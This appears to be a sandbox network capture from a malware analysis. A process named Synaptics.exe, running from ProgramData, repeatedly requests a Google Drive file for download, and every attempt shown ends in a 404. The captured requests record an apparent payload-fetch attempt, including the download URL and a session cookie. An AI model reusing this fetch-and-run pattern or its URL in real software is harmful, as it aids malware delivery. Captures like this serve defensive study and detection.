                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
                                                                                            2025-01-02 19:30:09 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                            2025-01-02 19:30:09 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="zruuiq4UMIZi5I3hwwXwMA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                            2025-01-02 19:30:09 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            100 | 192.168.2.9 | 50136 | 216.58.206.65 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            2025-01-02 19:30:08 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:09 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC7nyXUb0SbfzjgHWduGvSMJduuMXP99rPFMCsrFzQ87TDkufKe_vfeTDUv8tQnGDCSsPQbxllQ
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:09 GMT
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-arbLrr7Vv2NVz8WtzwCFKA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
                                                                                            2025-01-02 19:30:09 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                            2025-01-02 19:30:09 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="WAWTS_NDJvyy7bdtl3lGwg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                            2025-01-02 19:30:09 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            101 | 192.168.2.9 | 50139 | 172.217.18.14 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            2025-01-02 19:30:09 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:10 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:10 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-iKwOrE6BZhc31M9aC1QjVA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            102 | 192.168.2.9 | 50143 | 172.217.18.14 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            2025-01-02 19:30:10 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:10 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:10 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-Rex1ZcvY-259tzPfCGiZlQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            103 | 192.168.2.9 | 50144 | 216.58.206.65 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            2025-01-02 19:30:10 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:11 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC4dyq9hPdSeWPthq8c3kwqvA1LoQkljYy2lhY3QjAN5KvpdK0aB0TwZE0a51As6gQv1
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:11 GMT
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-Fur3sQMLSZAZiyBftdHbvA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
                                                                                            2025-01-02 19:30:11 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                            2025-01-02 19:30:11 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="YSackhOMX9KtfozeiwQuNA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                            2025-01-02 19:30:11 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            104 | 192.168.2.9 | 50145 | 172.217.18.14 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            2025-01-02 19:30:10 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:11 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:11 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-mMZLuNZAQr1gWjiuUPFSsg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            105 | 192.168.2.9 | 50148 | 172.217.18.14 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            2025-01-02 19:30:11 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:11 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:11 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-5DP-h0Yf2mGYynzUaMQ_yQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            106 | 192.168.2.9 | 50147 | 216.58.206.65 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            2025-01-02 19:30:11 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:11 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC7uufi-CuuSG2IT7wLak9LKJJWmSm-91fpdC4KXJFw3XMayJ_ox2MWl7zYcZNyeiWNyVZkJtO8
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:11 GMT
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-9zZK_44E4xkYScADtjQXmw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
                                                                                            2025-01-02 19:30:11 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                            2025-01-02 19:30:11 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="bkuoW5aH4BectVZFjwny4A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                            2025-01-02 19:30:11 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            107 | 192.168.2.9 | 50150 | 172.217.18.14 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            2025-01-02 19:30:12 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:12 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:12 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-637N9sa6WGT9b6JCAiR_kQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            108 | 192.168.2.9 | 50149 | 216.58.206.65 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            2025-01-02 19:30:12 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:12 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC64Xg5NVph1lDOLsZ_pznUCyOciwqzYz2Tlr_vK5SYko2JDgdeQbB83grcTehrQU-tfiYBEsus
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:12 GMT
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-5zp8a64Bmyh5nnK7psQqdw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
                                                                                            2025-01-02 19:30:12 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                            2025-01-02 19:30:12 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="nYjggBjz5g3bEosDzI4HVQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                            2025-01-02 19:30:12 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            109 | 192.168.2.9 | 50154 | 216.58.206.65 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            2025-01-02 19:30:12 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:13 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC4TyRTccBECYo2TD1GYGzwyu-Jl0hf5FmlwLivFKFPtG3z96yqZd6ZwLcSOykGyo7QFkbo0HGU
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:12 GMT
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
